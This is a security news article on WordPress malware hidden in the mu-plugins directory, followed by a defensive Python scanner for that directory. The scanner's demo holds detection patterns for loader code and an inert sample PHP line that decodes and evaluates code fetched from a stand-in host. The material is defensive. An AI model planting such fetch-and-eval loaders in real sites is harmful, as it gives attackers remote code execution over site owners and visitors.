- Sucuri’s researchers found malicious code hidden in the mu-plugins directory
- The malware redirected visitors, served spam and could even drop further malware
- The sites were compromised through vulnerable plugins, weak admin passwords and more
Researchers have confirmed that a special WordPress directory is being abused to host malicious code, warning that the code lets threat actors persist on vulnerable websites while executing arbitrary code, redirecting visitors to malicious sites and displaying spam and unwanted ads.
Sucuri’s researchers discovered that the threat actors hid the malicious code in “mu-plugins” (short for must-use plugins), a directory holding plugins that are loaded automatically and cannot be deactivated through the admin panel.
These are typically used for essential site functionality, custom modifications or performance optimizations that should always run.
Remote code execution risks
“This approach represents a worrying trend, since mu-plugins do not appear in the standard WordPress plugin interface, which makes them less noticeable and easier to overlook during routine security checks,” Sucuri’s researchers said.
So far, the analysis has uncovered three malicious code variants: redirect.php (redirects visitors to malicious sites), index.php (remote code execution and malware dropping) and custom-js-loader.php (injects spam).
“The potential impact ranges from minor inconveniences to serious security breaches, highlighting the importance of proactive website security measures,” Sucuri said.
Discussing how the sites could have been infected, the researchers said there are multiple ways to compromise a WordPress site, including exploiting a vulnerable plugin or theme, compromised admin credentials, or abuse of poorly secured hosting environments.
To mitigate the risk, website administrators should scan their WP installation for malicious files (particularly in the mu-plugins directory), check for unauthorized admin accounts, audit installed plugins, update WordPress, plugins and themes, change all admin passwords, configure 2FA where possible, and set up file-integrity monitoring with a security plugin.
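A defender-side check for the first of those steps, written for this article rather than taken from Sucuri’s report: it audits a wp-content/mu-plugins directory against an allowlist of files the administrator installed and flags loader constructs (eval, base64_decode, remote fetches, forced redirects) typical of the variants described. The allowlist, the patterns and the sample files are assumptions constructed for the demo; a hit is a prompt to inspect the file, not proof of compromise.

```python
import os
import re
import tempfile

# Assumed allowlist: the mu-plugin files this site's administrator knowingly installed.
KNOWN_MU_PLUGINS = {"site-tweaks.php"}

# Constructs commonly seen in injected PHP loaders. A match means "review by hand".
SUSPICIOUS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "remote_fetch": re.compile(r"\b(file_get_contents|curl_init)\s*\(\s*['\"]https?://"),
    "header_redirect": re.compile(r"\bheader\s*\(\s*['\"]Location:"),
}


def scan_mu_plugins(mu_dir, known=KNOWN_MU_PLUGINS):
    """Return {filename: [reasons]} for every file in mu_dir that deserves review."""
    findings = {}
    for name in sorted(os.listdir(mu_dir)):
        path = os.path.join(mu_dir, name)
        if not os.path.isfile(path):
            continue
        reasons = []
        if name not in known:
            reasons.append("not in allowlist")  # unexpected file, whatever it contains
        with open(path, errors="replace") as fh:
            body = fh.read()
        reasons += [tag for tag, rx in SUSPICIOUS.items() if rx.search(body)]
        if reasons:
            findings[name] = reasons
    return findings


def demo():
    """Constructed sample directory: one legitimate mu-plugin and two inert files
    mimicking the redirect and loader behaviour the article describes."""
    tmp = tempfile.mkdtemp()
    samples = {
        "site-tweaks.php": "<?php add_filter('show_admin_bar', '__return_false');\n",
        "redirect.php": "<?php if (!is_admin()) { header('Location: https://example.invalid/'); exit; }\n",
        "index.php": "<?php eval(base64_decode(file_get_contents('https://example.invalid/p')));\n",
    }
    for name, body in samples.items():
        with open(os.path.join(tmp, name), "w") as fh:
            fh.write(body)
    return scan_mu_plugins(tmp)
```

Run against a real install, point `scan_mu_plugins` at `wp-content/mu-plugins` and replace the allowlist with the files you actually deployed.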
WordPress is the world’s leading website builder, powering most websites on the internet. As such, the platform is under a constant flood of cyberattacks.
Via The Hacker News